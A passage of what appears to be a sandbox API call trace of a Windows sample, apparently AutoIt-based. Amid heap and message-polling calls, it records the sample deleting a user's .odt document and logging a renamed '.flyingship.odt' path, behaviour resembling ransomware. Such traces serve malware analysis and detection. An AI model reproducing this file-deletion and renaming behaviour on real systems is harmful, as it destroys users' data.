dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0180.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0180.058] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0180.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.058] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.058] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.058] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.058] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.059] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0180.059] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.059] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.060] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.060] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.060] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.060] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt", lpFilePart=0x0) returned 0x43 [0180.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3772ae0, ftCreationTime.dwHighDateTime=0x1d5e5f4, ftLastAccessTime.dwLowDateTime=0xf1b1dd60, ftLastAccessTime.dwHighDateTime=0x1d5d959, ftLastWriteTime.dwLowDateTime=0x1097f920, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4505, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="_--jWXD.odt", cAlternateFileName="")) returned 0x90ae18 [0180.061] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\_--jwxd.odt")) returned 1 [0180.064] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3772ae0, ftCreationTime.dwHighDateTime=0x1d5e5f4, ftLastAccessTime.dwLowDateTime=0xf1b1dd60, ftLastAccessTime.dwHighDateTime=0x1d5d959, ftLastWriteTime.dwLowDateTime=0x1097f920, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4505, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="_--jWXD.odt", cAlternateFileName="")) returned 0 [0180.064] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0180.064] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.065] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.065] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0180.065] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.066] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0180.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.066] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0180.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.066] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0180.066] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.067] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0180.067] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.067] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0180.067] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.067] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0180.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0180.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.068] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0180.068] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1c34, lpOverlapped=0x0) returned 1 [0180.068] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0180.068] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1c34, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.068] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0180.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0180.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.flyingship.odt\r\n", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0180.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x51) returned 0x8c4a48 [0180.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.flyingship.odt\r\n", cchWideChar=81, lpMultiByteStr=0x8c4a48, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.flyingship.odt\r\n", lpUsedDefaultChar=0x0) returned 81 [0180.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0180.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0180.069] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x50, lpOverlapped=0x0) returned 1 [0180.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0180.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.069] CloseHandle (hObject=0x138) returned 1 [0180.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0180.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0180.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0180.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0180.076] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0180.076] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0180.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0180.077] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0180.077] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.078] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0180.078] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0180.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0180.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0180.078] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0180.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0180.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0180.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.079] RtlAllocateHeap 